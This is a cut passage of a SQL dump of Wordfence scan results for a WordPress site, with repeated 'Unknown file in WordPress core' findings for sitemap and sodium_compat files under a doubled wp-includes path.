class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78012,1675048866,1675048866,'new','knownfile',75,'9444084b6f6bd750854591c96ab95ede','6255bba980e742bf9a747a1414208963','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78013,1675048866,1675048866,'new','knownfile',75,'3f3121fd3b4f20cfc488a4c8fbfa8899','1ed52d426cb977dfb51881de50bb1257','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78014,1675048866,1675048866,'new','knownfile',75,'42d55028e6ba7d7f8c41d836ce3a280c','1fcda2b7209bab4ce1c192b4f6564155','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78015,1675048866,1675048866,'new','knownfile',75,'3816ead09fe210f40dc9d478ca8744d5','d0e2dcefda6a6a19060736b15b9ada13','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78016,1675048866,1675048866,'new','knownfile',75,'e7571fc8612358f48feae34ef2a2dbc3','88e6c4e5a4452ae25150aaae2dc860d7','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78017,1675048866,1675048866,'new','knownfile',75,'585e3deac0b1afe5768ef075adfd518e','a47994685c75ad7c03a1b9ddb7c58ac3','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:75:\"wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78018,1675048866,1675048866,'new','knownfile',75,'bf960820c14e01e60a3219fa1284f5f3','a745eee7555ef8a3e9bee3faadc2b94d','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78019,1675048866,1675048866,'new','knownfile',75,'74464e2a8bcecd1700dec8723dd77ca4','39d94b220d9405d38651ba12055614d9','Unknown file in WordPress core: wp-includes/wp-includes/sitemaps.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/sitemaps.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78020,1675048866,1675048866,'new','knownfile',75,'80a02f995a7e74a874664a81a842c5ba','3dcd6d4f2f41fb23e2d13ff72f8d2ede','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/LICENSE','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/sodium_compat/LICENSE\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78021,1675048866,1675048866,'new','knownfile',75,'a916ec7764406b104063b96f5f7c0de7','0384da8fb6fd9aa6ee6631702c25acb2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/autoload-php7.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/sodium_compat/autoload-php7.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78022,1675048867,1675048867,'new','knownfile',75,'367e2edb8d789932fd3d7ee3a8b82e86','f9407b4506fabe482ee00c2f66cdb51e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/autoload.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/sodium_compat/autoload.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78023,1675048867,1675048867,'new','knownfile',75,'bb384270f58c8acca50f1c6f26c8511a','1deefd53dd687bfd5edd56ced8dcfaa7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/composer.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/sodium_compat/composer.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78024,1675048867,1675048867,'new','knownfile',75,'2b1c7c7d90b732bcb2d8c0a31223c4fc','b41f72416cde1cdcb90176b776b9302f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/constants.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/sodium_compat/lib/constants.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78025,1675048867,1675048867,'new','knownfile',75,'25f103eaf2287f708819317590d2e4ad','5ca1d1b9602685d01e5e69289b1a1f1e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/namespaced.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/sodium_compat/lib/namespaced.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78026,1675048867,1675048867,'new','knownfile',75,'967f990d59f951319584be1bdce983ef','8da9a3b0e256b89aa70c6533e7d34933','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/php72compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/lib/php72compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78027,1675048867,1675048867,'new','knownfile',75,'4ff9d7ff1cee269750a6e0b34584073c','82513fc15669e025a87d2f6b290d8fb3','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78028,1675048867,1675048867,'new','knownfile',75,'7ee178af2f72bd98c6e6ce4ef83bca93','5e5efd267692876d21ba1542165feede','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78029,1675048867,1675048867,'new','knownfile',75,'c8fad0aab103c67217d886163e7d4d20','beb21866e15767135aa721f6b7958fbf','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/namespaced/Compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78030,1675048867,1675048867,'new','knownfile',75,'1289fcca6cef4405f0a0cbdffb8e351e','35628eb2e44ea173d3a489e570c53c90','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78031,1675048867,1675048867,'new','knownfile',75,'a05ac6525392c24f7fd20b83a346a43d','0a04567d9e8892eb026ba52f574cbe8e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78032,1675048867,1675048867,'new','knownfile',75,'c0177948159e5d3f07c153de37e926cd','8e22e661b7cf85317116f2b5bb16c814','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78033,1675048867,1675048867,'new','knownfile',75,'a728c2603102d4da1ad63ad08b8f6336','81df55e19de771268031de5f3e01cdca','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78034,1675048867,1675048867,'new','knownfile',75,'bf66b69f59ce1a3190e63e5765f209ed','42bb56818e051c90a635c649e364a532','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78035,1675048867,1675048867,'new','knownfile',75,'c823afa1da0a28262e3a979571cd1795','83e7b738e6a82f42ede2fde919e75812','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:78:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78036,1675048867,1675048867,'new','knownfile',75,'f87fae08f2f4ac5eb1939b7b41868f55','05beff85dceee43c87bd025606eaa890','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78037,1675048867,1675048867,'new','knownfile',75,'d5e852ca329c155ba27e73e6c7bba7a6','01ae593eec16cefc33cca602c4fbfd0c','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78038,1675048867,1675048867,'new','knownfile',75,'57080d4b5d8a3a83e5276851787184d4','799d5cd1d949f202164d4e4621e0c2ca','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78039,1675048867,1675048867,'new','knownfile',75,'d04dcb163b46892f990ac7e31a89873f','7219164d5bffc684941abc65be5f3aa1','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:79:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78040,1675048868,1675048868,'new','knownfile',75,'a200da728e9b954b75bfd5ac3a2f5852','91ef5aa67f8ce4dec95bfe4e2d3177d8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78041,1675048868,1675048868,'new','knownfile',75,'37e94cb3e502edc7d027a0887007de60','dc2cbb12ee115fcdca4e8ba42d70acf5','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78042,1675048868,1675048868,'new','knownfile',75,'f1b5f69ddb81b6410a3818f85a69b27c','ad7f47840c2eb6e55d4c381155b279ee','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78043,1675048868,1675048868,'new','knownfile',75,'eae16686a61263e83885574f076bbf82','12c0b3cbc74f259d0d2e5183faf702ed','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78044,1675048868,1675048868,'new','knownfile',75,'e04be688c74cb46a3281d561dc858c07','d024b274fa9778bfd561eeded8589c85','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78045,1675048868,1675048868,'new','knownfile',75,'652ac51b364d6cabac2e240aceba50ea','b484338942b7784e1d2eed887f3dc127','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78046,1675048868,1675048868,'new','knownfile',75,'6d5bd1790bf116123e80b953304dd48f','0031cf7490b9fc13330152bc1f44fe3c','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78047,1675048868,1675048868,'new','knownfile',75,'98008eed508913223ca3a844e5636a46','2e8702e10f2fbc61d6035d1a56fa9466','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" 